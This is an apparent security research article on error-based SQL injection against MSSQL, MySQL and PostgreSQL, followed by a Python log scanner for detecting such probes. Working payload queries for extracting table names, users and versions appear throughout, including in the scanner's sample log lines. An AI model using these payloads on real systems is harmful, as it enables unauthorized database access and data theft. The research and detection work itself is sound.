Methods of Quick Exploitation of Blind SQL Injection
Summary: A couple of days ago TinKode attracted everybody's attention by breaking into a web site in the army.mil domain. The server onestop.army.mil was attacked, and the investigator found a Blind SQL Injection vulnerability on it.

[screenshots in the original: a logically true query; a logically false query]

This time, I was most interested not in the fact of the server compromise, but in the technique applied to exploit the Blind SQL Injection vulnerability on DBMS MSSQL 2000. Thus, if casting via the function convert is unsuccessful, MSSQL places useful data into the error message. Testing of a later version, MSSQL 2005, showed that the technique used by TinKode is applicable to it, too:

    select convert(int,@@version)
    select convert(int,(select table_name from (select row_number() over (order by table_name) as rownum,table_name from information_schema.tables) as t where t.rownum=1))
    select convert(int,(select table_name from (select row_number() over (order by table_name) as rownum,table_name from information_schema.tables) as t where t.rownum=2))
    ...

Similar manipulations with casting were conducted for the widespread DBMS MySQL. The experiment showed that in case of unsuccessful casting, MySQL returns only a non-critical warning, which cannot be used to achieve the same results in Blind SQL Injection exploitation:

    mysql> select cast('str1' as char);
    +----------------------+
    | cast('str1' as char) |
    +----------------------+
    | str1                 |
    +----------------------+
    1 row in set (0.00 sec)

    mysql> select cast('str1' as decimal);
    +-------------------------+
    | cast('str1' as decimal) |
    +-------------------------+
    |                       0 |
    +-------------------------+
    1 row in set, 1 warning (0.01 sec)

    mysql> show warnings;
    +---------+------+-------------------------------------------+
    | Level   | Code | Message                                   |
    +---------+------+-------------------------------------------+
    | Warning | 1292 | Truncated incorrect DECIMAL value: 'str1' |
    +---------+------+-------------------------------------------+
    1 row in set (0.00 sec)

    mysql> select convert('str2',char);
    +----------------------+
    | convert('str2',char) |
    +----------------------+
    | str2                 |
    +----------------------+
    1 row in set (0.00 sec)

    mysql> select convert('str2',decimal);
    +-------------------------+
    | convert('str2',decimal) |
    +-------------------------+
    |                       0 |
    +-------------------------+
    1 row in set, 1 warning (0.00 sec)

    mysql> show warnings;
    +---------+------+-------------------------------------------+
    | Level   | Code | Message                                   |
    +---------+------+-------------------------------------------+
    | Warning | 1292 | Truncated incorrect DECIMAL value: 'str2' |
    +---------+------+-------------------------------------------+
    1 row in set (0.00 sec)

Well and good. But then, the universal exploitation technique by Qwazar is applicable to all MySQL versions:

    select count(*),concat(version(),floor(rand(0)*2))x from table group by x
    select count(*),concat((select user from mysql.user limit 0,1),floor(rand(0)*2))x from mysql.user group by x
    select count(*),concat((select user from mysql.user limit 1,1),floor(rand(0)*2))x from mysql.user group by x
    ...

    select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)

Using one such request, an attacker can obtain up to 64 bytes of useful data from the error message. This technique can be used for MySQL v3.x.

Further experiments with the technique proposed by TinKode showed that this method can be applied to PostgreSQL, too:

    select cast(version() as numeric)
    select cast((select table_name from information_schema.tables limit 1 offset 0) as numeric)
    select cast((select table_name from information_schema.tables limit 1 offset 1) as numeric)
    ...

Like MSSQL, PostgreSQL doesn't seriously restrict the length of the data returned within an error message. If the function pg_last_error is not called within the context of PHP, but error_reporting is still enabled, then one query allows an attacker to obtain up to 1229 bytes of useful data from the error message generated by PHP.

Unfortunately, such tricks will not work with Oracle. It is necessary to consider this DBMS...
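The three query families summarized above (MSSQL convert(int, ...), PostgreSQL cast(... as numeric), and the MySQL floor(rand(0)*2) ... group by trick) all leave a recognizable shape in the request. The following is an added defensive example, not code from the original article or from Positive Technologies: it scans Common Log Format access-log lines for those shapes after URL-decoding (including double encoding) and comment stripping. The log lines, client addresses (RFC 5737 documentation ranges) and paths are constructed for the example; the signatures cover only the query shapes shown on this page.

```python
"""Flag the error-based SQL injection probe families shown above in web access logs.

Added defensive example, not code from the original article. The access-log lines,
client addresses and URLs are constructed; the three signatures cover only the
query shapes the article shows.
"""
import re
from urllib.parse import unquote_plus

# Common Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Signatures are matched against a canonical form of the request target
# (URL-decoded, lowercased, inline comments removed, whitespace collapsed).
SIGNATURES = {
    # MSSQL: convert(int, <subquery | @@version>) forces a conversion error
    "mssql_convert_cast": re.compile(
        r'convert\(\s*int\s*,\s*(?:\(\s*select\b|@@version)'),
    # PostgreSQL: cast(<subquery | version()> as numeric) forces a conversion error
    "pgsql_cast_numeric": re.compile(
        r'cast\(\s*(?:\(\s*select\b|version\(\)).*?\bas\s+numeric\s*\)'),
    # MySQL: concat(<data>, floor(rand(0)*2))x ... group by x duplicate-key trick
    "mysql_rand_groupby": re.compile(
        r'concat\(.*?floor\(\s*rand\(\s*0?\s*\)\s*\*\s*2\s*\)\s*\)\s*\w*\s*from\b'
        r'.*?\bgroup\s+by\b'),
}


def normalize(target: str) -> str:
    """Canonicalize a request target: decode repeatedly (defeats double
    encoding such as %256f -> %6f -> o), lowercase, drop /* */ comments,
    collapse whitespace."""
    decoded = target
    for _ in range(3):
        again = unquote_plus(decoded)
        if again == decoded:
            break
        decoded = again
    decoded = re.sub(r'/\*.*?\*/', ' ', decoded.lower())
    return re.sub(r'\s+', ' ', decoded)


def classify(target: str) -> list:
    """Return the names of all signature families matching the target."""
    canon = normalize(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(canon)]


def scan_log(text: str) -> list:
    """Return (client_ip, http_status, [families]) for each suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        families = classify(m["target"])
        if families:
            hits.append((m["ip"], int(m["status"]), families))
    return hits


# Constructed sample log: benign requests, one probe per family, a double-encoded
# probe (c%256fnvert) and a benign search that merely contains the keywords.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Feb/2010:13:55:36 +0000] "GET /news.php?id=1 HTTP/1.1" 200 5120
203.0.113.10 - - [10/Feb/2010:13:55:41 +0000] "GET /news.php?id=1%20and%201=convert(int,@@version) HTTP/1.1" 500 311
203.0.113.10 - - [10/Feb/2010:13:55:49 +0000] "GET /news.php?id=1%20and%201=convert(int,(select%20table_name%20from%20(select%20row_number()%20over%20(order%20by%20table_name)%20as%20rownum,table_name%20from%20information_schema.tables)%20as%20t%20where%20t.rownum=1)) HTTP/1.1" 500 402
198.51.100.7 - - [10/Feb/2010:14:02:03 +0000] "GET /item.php?id=5%20and%201=cast((select%20table_name%20from%20information_schema.tables%20limit%201%20offset%200)%20as%20numeric) HTTP/1.1" 500 1340
198.51.100.7 - - [10/Feb/2010:14:02:10 +0000] "GET /item.php?id=5%20and%201=cast(version()%20as%20numeric) HTTP/1.1" 500 1290
192.0.2.44 - - [10/Feb/2010:14:10:22 +0000] "GET /view.php?id=3%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 270
192.0.2.45 - - [10/Feb/2010:14:11:02 +0000] "GET /view.php?id=3%20and%20row(1,1)%3E(select%20count(*),concat(version(),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201) HTTP/1.1" 500 268
192.0.2.46 - - [10/Feb/2010:14:12:00 +0000] "GET /view.php?id=3%20and%201=c%256fnvert(int,@@version) HTTP/1.1" 500 311
192.0.2.47 - - [10/Feb/2010:14:13:00 +0000] "GET /search.php?q=convert+my+numeric+rand+list HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for ip, status, families in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} {','.join(families)}")
```

A matching request that also produced a 5xx status is the corroborating signal that the application let the DBMS error reach the client, which is exactly what the summary above relies on (the PHP error_reporting point). Signatures like these only catch the shapes shown on this page; the durable fix is parameterized queries and never returning raw DBMS error text in HTTP responses.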
Source: Positive Technologies Research Lab